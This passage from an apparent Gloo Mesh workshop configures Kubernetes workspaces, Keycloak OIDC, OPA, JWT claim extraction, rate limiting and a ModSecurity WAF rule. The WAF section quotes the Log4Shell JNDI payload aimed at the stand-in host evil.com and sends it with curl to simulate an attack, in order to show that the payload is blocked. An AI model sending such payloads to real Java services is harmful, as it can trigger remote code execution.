kubectl --context ${CLUSTER1} -n bookinfo-frontends debug -i -q ${pod} --image=curlimages/curl -- curl -s http://reviews.bookinfo-backends:9080/reviews/0 | jq
echo "From productpage to ratings, should be denied"
kubectl --context ${CLUSTER1} -n bookinfo-frontends debug -i -q ${pod} --image=curlimages/curl -- curl -s http://ratings.bookinfo-backends:9080/ratings/0 -i
You should get a 403
response code which means that the sidecar proxy of the reviews
service doesn't allow the request.
HTTP/1.1 403 Forbidden
content-length: 19
content-type: text/plain
server: envoy
x-envoy-upstream-service-time: 18
RBAC: access denied
Let's rollback the change we've made in the WorkspaceSettings
object:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: bookinfo
namespace: bookinfo-frontends
spec:
importFrom:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
exportTo:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
labels:
app: productpage
- kind: SERVICE
labels:
app: reviews
- kind: ALL
labels:
expose: "true"
EOF
and delete the AccessPolicies
:
kubectl --context ${CLUSTER1} delete accesspolicies -n bookinfo-frontends --all
We're going to create a workspace for the team in charge of the httpbin application.
The platform team needs to create the corresponding Workspace
Kubernetes objects in the Gloo Mesh management cluster.
Let's create the httpbin
workspace which corresponds to the httpbin
namespace on cluster1
:
kubectl apply --context ${MGMT} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: Workspace
metadata:
name: httpbin
namespace: gloo-mesh
labels:
allow_ingress: "true"
spec:
workloadClusters:
- name: cluster1
namespaces:
- name: httpbin
EOF
Then, the Httpbin team creates a WorkspaceSettings
Kubernetes object in one of the namespaces of the httpbin
workspace:
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: httpbin
namespace: httpbin
spec:
importFrom:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
exportTo:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
labels:
app: in-mesh
- kind: ALL
labels:
expose: "true"
EOF
The Httpbin team has decided to export the following to the gateway
workspace (using a reference):
- the
in-mesh
Kubernetes service - all the resources (RouteTables, VirtualDestination, ...) that have the label
expose
set totrue
In this step, we're going to expose an external service through a Gateway using Gloo Mesh and show how we can then migrate this service to the Mesh.
Let's create an ExternalService
corresponding to httpbin.org
:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: ExternalService
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
hosts:
- httpbin.org
ports:
- name: http
number: 80
protocol: HTTP
- name: https
number: 443
protocol: HTTPS
clientsideTls: {}
EOF
Now, you can create a RouteTable
to expose httpbin.org
through the gateway:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
matchers:
- uri:
exact: /get
forwardTo:
destinations:
- kind: EXTERNAL_SERVICE
port:
number: 443
ref:
name: httpbin
namespace: httpbin
EOF
You should now be able to access httpbin.org
external service through the gateway.
Get the URL to access the httpbin
service using the following command:
echo "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/get"
Let's update the RouteTable
to direct 50% of the traffic to the local httpbin
service:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
matchers:
- uri:
exact: /get
forwardTo:
destinations:
- kind: EXTERNAL_SERVICE
port:
number: 443
ref:
name: httpbin
namespace: httpbin
weight: 50
- ref:
name: in-mesh
namespace: httpbin
port:
number: 8000
weight: 50
EOF
If you refresh your browser, you should see that you get a response either from the local service or from the external service.
When the response comes from the external service (httpbin.org), there's a X-Amzn-Trace-Id
header.
And when the response comes from the local service, there's a X-B3-Parentspanid
header.
Finally, you can update the RouteTable
to direct all the traffic to the local httpbin
service:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
matchers:
- uri:
exact: /get
forwardTo:
destinations:
- ref:
name: in-mesh
namespace: httpbin
port:
number: 8000
EOF
If you refresh your browser, you should see that you get responses only from the local service.
This diagram shows the flow of the requests :
In many use cases, you need to restrict the access to your applications to authenticated users.
OIDC (OpenID Connect) is an identity layer on top of the OAuth 2.0 protocol. In OAuth 2.0 flows, authentication is performed by an external Identity Provider (IdP) which, in case of success, returns an Access Token representing the user identity. The protocol does not define the contents and structure of the Access Token, which greatly reduces the portability of OAuth 2.0 implementations.
The goal of OIDC is to address this ambiguity by additionally requiring Identity Providers to return a well-defined ID Token. OIDC ID tokens follow the JSON Web Token standard and contain specific fields that your applications can expect and handle. This standardization allows you to switch between Identity Providers – or support multiple ones at the same time – with minimal, if any, changes to your downstream services; it also allows you to consistently apply additional security measures like Role-based Access Control (RBAC) based on the identity of your users, i.e. the contents of their ID token.
In this lab, we're going to install Keycloak. It will allow us to setup OIDC workflows later.
Let's install it:
kubectl --context ${MGMT} create namespace keycloak
cat data/steps/deploy-keycloak/keycloak.yaml | sed "s/image: quay.io/image: ${registry}/g" | kubectl --context ${MGMT} -n keycloak apply -f -
kubectl --context ${MGMT} -n keycloak rollout status deploy/keycloak
Then, we will configure it and create two users:
-
User1 credentials:
user1/password
Email: [email protected] -
User2 credentials:
user2/password
Email: [email protected]
Let's set the environment variables we need:
export ENDPOINT_KEYCLOAK=$(kubectl --context ${MGMT} -n keycloak get service keycloak -o jsonpath='{.status.loadBalancer.ingress[0].*}'):8080
export HOST_KEYCLOAK=$(echo ${ENDPOINT_KEYCLOAK} | cut -d: -f1)
export PORT_KEYCLOAK=$(echo ${ENDPOINT_KEYCLOAK} | cut -d: -f2)
export KEYCLOAK_URL=http://${ENDPOINT_KEYCLOAK}
Now, we need to get a token:
export KEYCLOAK_TOKEN=$(curl -d "client_id=admin-cli" -d "username=admin" -d "password=admin" -d "grant_type=password" "$KEYCLOAK_URL/realms/master/protocol/openid-connect/token" | jq -r .access_token)
After that, we configure Keycloak:
# Create initial token to register the client
read -r client token <<<$(curl -H "Authorization: Bearer ${KEYCLOAK_TOKEN}" -X POST -H "Content-Type: application/json" -d '{"expiration": 0, "count": 1}' $KEYCLOAK_URL/admin/realms/master/clients-initial-access | jq -r '[.id, .token] | @tsv')
export KEYCLOAK_CLIENT=${client}
# Register the client
read -r id secret <<<$(curl -X POST -d "{ \"clientId\": \"${KEYCLOAK_CLIENT}\" }" -H "Content-Type:application/json" -H "Authorization: bearer ${token}" ${KEYCLOAK_URL}/realms/master/clients-registrations/default| jq -r '[.id, .secret] | @tsv')
export KEYCLOAK_SECRET=${secret}
# Add allowed redirect URIs
curl -H "Authorization: Bearer ${KEYCLOAK_TOKEN}" -X PUT -H "Content-Type: application/json" -d '{"serviceAccountsEnabled": true, "directAccessGrantsEnabled": true, "authorizationServicesEnabled": true, "redirectUris": ["'https://${ENDPOINT_HTTPS_GW_CLUSTER1}'/callback","'https://${ENDPOINT_HTTPS_GW_CLUSTER1}'/get"]}' $KEYCLOAK_URL/admin/realms/master/clients/${id}
# Add the group attribute in the JWT token returned by Keycloak
curl -H "Authorization: Bearer ${KEYCLOAK_TOKEN}" -X POST -H "Content-Type: application/json" -d '{"name": "group", "protocol": "openid-connect", "protocolMapper": "oidc-usermodel-attribute-mapper", "config": {"claim.name": "group", "jsonType.label": "String", "user.attribute": "group", "id.token.claim": "true", "access.token.claim": "true"}}' $KEYCLOAK_URL/admin/realms/master/clients/${id}/protocol-mappers/models
# Create first user
curl -H "Authorization: Bearer ${KEYCLOAK_TOKEN}" -X POST -H "Content-Type: application/json" -d '{"username": "user1", "email": "[email protected]", "enabled": true, "attributes": {"group": "users"}, "credentials": [{"type": "password", "value": "password", "temporary": false}]}' $KEYCLOAK_URL/admin/realms/master/users
# Create second user
curl -H "Authorization: Bearer ${KEYCLOAK_TOKEN}" -X POST -H "Content-Type: application/json" -d '{"username": "user2", "email": "[email protected]", "enabled": true, "attributes": {"group": "users"}, "credentials": [{"type": "password", "value": "password", "temporary": false}]}' $KEYCLOAK_URL/admin/realms/master/users
Note: If you get a Not Authorized error, please, re-run this command and continue from the command started to fail:
KEYCLOAK_TOKEN=$(curl -d "client_id=admin-cli" -d "username=admin" -d "password=admin" -d "grant_type=password" "$KEYCLOAK_URL/realms/master/protocol/openid-connect/token" | jq -r .access_token)
In this step, we're going to secure the access to the httpbin
service using OAuth.
First, we need to create a Kubernetes Secret that contains the OIDC secret:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: v1
kind: Secret
metadata:
name: oauth
namespace: httpbin
type: extauth.solo.io/oauth
data:
client-secret: $(echo -n ${KEYCLOAK_SECRET} | base64)
EOF
Then, you need to create an ExtAuthPolicy
, which is a CRD that contains authentication information:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: ExtAuthPolicy
metadata:
name: httpbin
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
oauth: "true"
config:
server:
name: ext-auth-server
namespace: httpbin
cluster: cluster1
glooAuth:
configs:
- oauth2:
oidcAuthorizationCode:
appUrl: "https://${ENDPOINT_HTTPS_GW_CLUSTER1}"
callbackPath: /callback
clientId: ${KEYCLOAK_CLIENT}
clientSecretRef:
name: oauth
namespace: httpbin
issuerUrl: "${KEYCLOAK_URL}/realms/master/"
session:
failOnFetchFailure: true
redis:
cookieName: keycloak-session
options:
host: redis:6379
scopes:
- email
headers:
idTokenHeader: jwt
EOF
After that, you need to create an ExtAuthServer
, which is a CRD that define which extauth server to use:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: ExtAuthServer
metadata:
name: ext-auth-server
namespace: httpbin
spec:
destinationServer:
ref:
cluster: cluster1
name: ext-auth-service
namespace: gloo-mesh-addons
port:
name: grpc
EOF
Finally, you need to update the RouteTable
to use this ExtAuthPolicy
:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
labels:
oauth: "true"
matchers:
- uri:
exact: /get
- uri:
exact: /logout
- uri:
prefix: /callback
forwardTo:
destinations:
- ref:
name: in-mesh
namespace: httpbin
port:
number: 8000
EOF
If you refresh the web browser, you will be redirected to the authentication page.
If you use the username user1
and the password password
you should be redirected back to the httpbin
application.
You can also perform authorization using OPA.
First, you need to create a ConfigMap
with the policy written in rego:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: v1
kind: ConfigMap
metadata:
name: allow-solo-email-users
namespace: httpbin
data:
policy.rego: |-
package test
default allow = false
allow {
[header, payload, signature] = io.jwt.decode(input.state.jwt)
endswith(payload["email"], "@solo.io")
}
EOF
Then, you need to update the ExtAuthPolicy
object to add the authorization step:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: ExtAuthPolicy
metadata:
name: httpbin
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
oauth: "true"
config:
server:
name: ext-auth-server
namespace: httpbin
cluster: cluster1
glooAuth:
configs:
- oauth2:
oidcAuthorizationCode:
appUrl: "https://${ENDPOINT_HTTPS_GW_CLUSTER1}"
callbackPath: /callback
clientId: ${KEYCLOAK_CLIENT}
clientSecretRef:
name: oauth
namespace: httpbin
issuerUrl: "${KEYCLOAK_URL}/realms/master/"
logoutPath: /logout
afterLogoutUrl: "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/get"
session:
failOnFetchFailure: true
redis:
cookieName: keycloak-session
options:
host: redis:6379
scopes:
- email
headers:
idTokenHeader: jwt
- opaAuth:
modules:
- name: allow-solo-email-users
namespace: httpbin
query: "data.test.allow == true"
EOF
Refresh the web page. user1
shouldn't be allowed to access it anymore since the user's email ends with @example.com
.
If you open the browser in incognito and login using the username user2
and the password password
, you will now be able to access it since the user's email ends with @solo.io
.
This diagram shows the flow of the request (with the Istio ingress gateway leveraging the extauth
Pod to authorize the request):
In this step, we're going to validate the JWT token and to create a new header from the email
claim.
Keycloak is running outside of the Service Mesh, so we need to define an ExternalService
and its associated ExternalEndpoint
:
Let's start by the latter:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: ExternalEndpoint
metadata:
name: keycloak
namespace: httpbin
labels:
host: keycloak
spec:
address: ${HOST_KEYCLOAK}
ports:
- name: http
number: ${PORT_KEYCLOAK}
EOF
Then we can create the former:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: ExternalService
metadata:
name: keycloak
namespace: httpbin
labels:
expose: "true"
spec:
hosts:
- keycloak
ports:
- name: http
number: ${PORT_KEYCLOAK}
protocol: HTTP
selector:
host: keycloak
EOF
Now, we can create a JWTPolicy
to extract the claim.
Create the policy:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: JWTPolicy
metadata:
name: httpbin
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
oauth: "true"
config:
phase:
postAuthz:
priority: 1
providers:
keycloak:
issuer: ${KEYCLOAK_URL}/realms/master
tokenSource:
headers:
- name: jwt
remote:
url: ${KEYCLOAK_URL}/realms/master/protocol/openid-connect/certs
destinationRef:
kind: EXTERNAL_SERVICE
ref:
name: keycloak
port:
number: ${PORT_KEYCLOAK}
claimsToHeaders:
- claim: email
header: X-Email
EOF
You can see that it will be applied to our existing route and also that we want to execute it after performing the external authentication (to have access to the JWT token).
If you refresh the web page, you should see a new X-Email
header added to the request with the value [email protected]
In this step, we're going to use a regular expression to extract a part of an existing header and to create a new one:
Let's create a TransformationPolicy
to extract the claim.
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: TransformationPolicy
metadata:
name: modify-header
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
oauth: "true"
config:
phase:
postAuthz:
priority: 2
request:
injaTemplate:
extractors:
organization:
header: 'X-Email'
regex: '.*@(.*)$'
subgroup: 1
headers:
x-organization:
text: "{{ organization }}"
EOF
You can see that it will be applied to our existing route and also that we want to execute it after performing the external authentication (to have access to the JWT token).
If you refresh the web page, you should see a new X-Organization
header added to the request with the value solo.io
In this step, we're going to apply rate limiting to the Gateway to only allow 3 requests per minute for the users of the solo.io
organization.
First, we need to create a RateLimitClientConfig
object to define the descriptors:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: RateLimitClientConfig
metadata:
name: httpbin
namespace: httpbin
spec:
raw:
rateLimits:
- setActions:
- requestHeaders:
descriptorKey: organization
headerName: X-Organization
EOF
Then, we need to create a RateLimitServerConfig
object to define the limits based on the descriptors:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: RateLimitServerConfig
metadata:
name: httpbin
namespace: httpbin
spec:
destinationServers:
- ref:
cluster: cluster1
name: rate-limiter
namespace: gloo-mesh-addons
port:
name: grpc
raw:
setDescriptors:
- simpleDescriptors:
- key: organization
value: solo.io
rateLimit:
requestsPerUnit: 3
unit: MINUTE
EOF
After that, we need to create a RateLimitPolicy
object to define the descriptors:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: RateLimitPolicy
metadata:
name: httpbin
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
ratelimited: "true"
config:
serverSettings:
name: rate-limit-server
namespace: httpbin
cluster: cluster1
ratelimitClientConfig:
name: httpbin
namespace: httpbin
cluster: cluster1
ratelimitServerConfig:
name: httpbin
namespace: httpbin
cluster: cluster1
phase:
postAuthz:
priority: 3
EOF
We also need to create a RateLimitServerSettings
, which is a CRD that define which extauth server to use:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: RateLimitServerSettings
metadata:
name: rate-limit-server
namespace: httpbin
spec:
destinationServer:
ref:
cluster: cluster1
name: rate-limiter
namespace: gloo-mesh-addons
port:
name: grpc
EOF
Finally, you need to update the RouteTable
to use this RateLimitPolicy
:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
labels:
oauth: "true"
ratelimited: "true"
matchers:
- uri:
exact: /get
- uri:
prefix: /callback
forwardTo:
destinations:
- ref:
name: in-mesh
namespace: httpbin
port:
number: 8000
EOF
Refresh the web page multiple times.
You should get a 200
response code the first 3 time and a 429
response code after.
This diagram shows the flow of the request (with the Istio ingress gateway leveraging the rate limiter
Pod to determine if the request should be allowed):
Let's apply the original RouteTable
yaml:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
matchers:
- uri:
exact: /get
forwardTo:
destinations:
- ref:
name: in-mesh
namespace: httpbin
port:
number: 8000
EOF
And also delete the different objects we've created:
kubectl --context ${CLUSTER1} -n httpbin delete ratelimitpolicy httpbin
kubectl --context ${CLUSTER1} -n httpbin delete ratelimitclientconfig httpbin
kubectl --context ${CLUSTER1} -n httpbin delete ratelimitserverconfig httpbin
kubectl --context ${CLUSTER1} -n httpbin delete ratelimitserversettings rate-limit-server
A web application firewall (WAF) protects web applications by monitoring, filtering, and blocking potentially harmful traffic and attacks that can overtake or exploit them.
Gloo Mesh includes the ability to enable the ModSecurity Web Application Firewall for any incoming and outgoing HTTP connections.
An example of how using Gloo Mesh we'd easily mitigate the recent Log4Shell vulnerability (CVE-2021-44228), which for many enterprises was a major ordeal that took weeks and months of updating all services.
The Log4Shell vulnerability impacted all Java applications that used the log4j library (common library used for logging) and that exposed an endpoint. You could exploit the vulnerability by simply making a request with a specific header. In the example below, we will show how to protect your services against the Log4Shell exploit.
Using the Web Application Firewall capabilities you can reject requests containing such headers.
Log4Shell attacks operate by passing in a Log4j expression that could trigger a lookup to a remote server, like a JNDI identity service. The malicious expression might look something like this: ${jndi:ldap://evil.com/x}
. It might be passed in to the service via a header, a request argument, or a request payload. What the attacker is counting on is that the vulnerable system will log that string using log4j without checking it. That’s what triggers the destructive JNDI lookup and the ultimate execution of malicious code.
Create the WAF policy:
kubectl --context ${CLUSTER1} apply -f - <<'EOF'
apiVersion: security.policy.gloo.solo.io/v2
kind: WAFPolicy
metadata:
name: log4shell
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
waf: "true"
config:
disableCoreRuleSet: true
customInterventionMessage: 'Log4Shell malicious payload'
customRuleSets:
- ruleStr: |
SecRuleEngine On
SecRequestBodyAccess On
SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@*
"@rx \${jndi:(?:ldaps?|iiop|dns|rmi)://"
"id:1000,phase:2,deny,status:403,log,msg:'Potential Remote Command Execution: Log4j CVE-2021-44228'"
EOF
In this example, we're going to update the main RouteTable
to enforce this policy for all the applications exposed through the gateway (in any workspace).
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: main
namespace: istio-gateways
spec:
hosts:
- '*'
virtualGateways:
- name: north-south-gw
namespace: istio-gateways
cluster: cluster1
workloadSelectors: []
http:
- name: root
labels:
waf: "true"
matchers:
- uri:
prefix: /
delegate:
routeTables:
- labels:
expose: "true"
EOF
Run the following command to simulate an attack:
curl -H "User-Agent: \${jndi:ldap://evil.com/x}" -k "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/get" -i
The request should be rejected:
HTTP/2 403
content-length: 27
content-type: text/plain
date: Tue, 05 Apr 2022 10:20:06 GMT
server: istio-envoy
Log4Shell malicious payload
Let's apply the original RouteTable
yaml:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: main
namespace: istio-gateways
spec:
hosts:
- '*'
virtualGateways:
- name: north-south-gw
namespace: istio-gateways
cluster: cluster1
workloadSelectors: []
http:
- name: root
matchers:
- uri:
prefix: /
delegate:
routeTables:
- labels:
expose: "true"
EOF
And also delete the waf policy we've created:
kubectl --context ${CLUSTER1} -n httpbin delete wafpolicies.security.policy.gloo.solo.io log4shell